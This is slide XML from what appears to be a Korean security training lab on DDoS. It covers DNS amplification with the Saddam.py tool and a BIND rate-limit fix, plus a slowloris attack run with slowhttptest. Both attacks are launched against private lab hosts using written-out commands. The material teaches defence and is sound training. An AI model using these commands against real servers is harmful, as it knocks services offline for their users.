            <a:ext cx="5616792" cy="2209606"/>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247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABD08CA-E4CF-4213-AC0C-80AE18A3D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081338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99397CCC-E732-4B75-AAAA-C1D6A16E4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90" y="4645152"/>
            <a:ext cx="3260725" cy="39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799853"/>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공격이 가능한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example.com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92176618"/>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대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.101 example.com</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ dig : DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답에 활용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>툴로서 도메인 분석 등에 활용 되고 있다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증폭 지수 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># python /root/Saddam.py benchmark –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns.txt:example.com</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171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>배 증폭 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 효과 확인을 위해 공격 대상 호스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>메시지 전송</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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDD7370-2AB2-4B53-B728-657DF13B3F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="1405466"/>
            <a:ext cx="5400040" cy="3317748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D526DA-061F-4F54-A958-6AE5D137648C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="940102"/>
            <a:ext cx="5400040" cy="1935607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10588D4-007E-41FA-BB9B-8B4E11F1FE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="3683301"/>
            <a:ext cx="5400040" cy="785368"/>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431329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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>증폭 공격 수행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 ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답이 지연됨을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Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 공격 중지</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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 시간이 정상으로 복구됨을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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084362D9-AA37-45BA-85EB-5B28E38164D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="715904"/>
            <a:ext cx="5400040" cy="1654556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CDA9C7-D213-4BF4-A5B0-3E1F7E79154A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2775808"/>
            <a:ext cx="5400040" cy="3307842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D382A9-BCB0-4FAD-90DC-3E573B44E54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="715904"/>
            <a:ext cx="5400040" cy="1909191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C110515D-8934-4EBD-9D2A-A518F8E0455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="3206468"/>
            <a:ext cx="5400040" cy="2670048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275123242"/>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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91563336-34FC-48F0-BDB5-EB9B3E13B470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392121"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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E6A2DB-FD5C-4AA2-A494-F01D7EEA6740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019628" y="989088"/>
            <a:ext cx="3985260" cy="47942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2965261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/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– DNS Amplification</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일부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증폭 공격을 받는 중으로 보고되었다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Bind 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설정을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하나의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 분당 요청할 수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쿼리의 수를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Amplification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DNS Victim(CentOS 6.4 / 10.10.1.101) + DDWRT(10.10.1.1)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3B0801D1-9391-4CD4-B7B8-6A264D1A2AD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41564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 1) wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</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2) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</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249B49EA-BD74-477E-BE2D-B290D96B4619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="711502"/>
            <a:ext cx="5400040" cy="3643884"/>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FC1C7637-0B41-4FAA-A8F7-F2A144ECFC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="711502"/>
            <a:ext cx="5400040" cy="3774059"/>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53451184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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정 </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named.conf</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named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    #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pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</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304715AE-F2D4-41B7-862C-8CAB30285A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="899280"/>
            <a:ext cx="5400040" cy="3046857"/>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689F28BD-F87C-43A6-9DAA-0E83A08F0439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="531887"/>
            <a:ext cx="5400040" cy="2961386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24349896-23EB-465B-9AA6-7B5A35EBDB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="2816679"/>
            <a:ext cx="2506436" cy="4816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Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDFBB7A-FEBD-41D1-A96D-BA74B152BEF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="4973259"/>
            <a:ext cx="5400040" cy="561086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADDB49C-CF5A-4270-9020-7A4668FCB783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="5601572"/>
            <a:ext cx="5400040" cy="66141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16887554"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF9B646-7D29-463F-82C6-FE73F865C07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="703338"/>
            <a:ext cx="5400040" cy="3908806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAB0F42-D264-4B56-9055-8697D1412C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6571343" y="760488"/>
            <a:ext cx="3360420" cy="754380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058307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아파치 웹 서버가 동작하고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9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3" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB54BA98-243A-4E14-B824-BBBE2268CCC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411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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 전 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시 접속 가능</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공격서버에서 실습서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowhttptest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 4000 -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10 -r 100 -t GET -x 3 -p 3 –u http://10.10.1.101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47859000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078FAAE2-E477-41F2-AE13-F4AA63DAD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0560"/>
            <a:ext cx="5400675" cy="3957638"/>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247860280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F8E71E-1C3D-4BB0-9660-B684439BC6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5" y="890065"/>
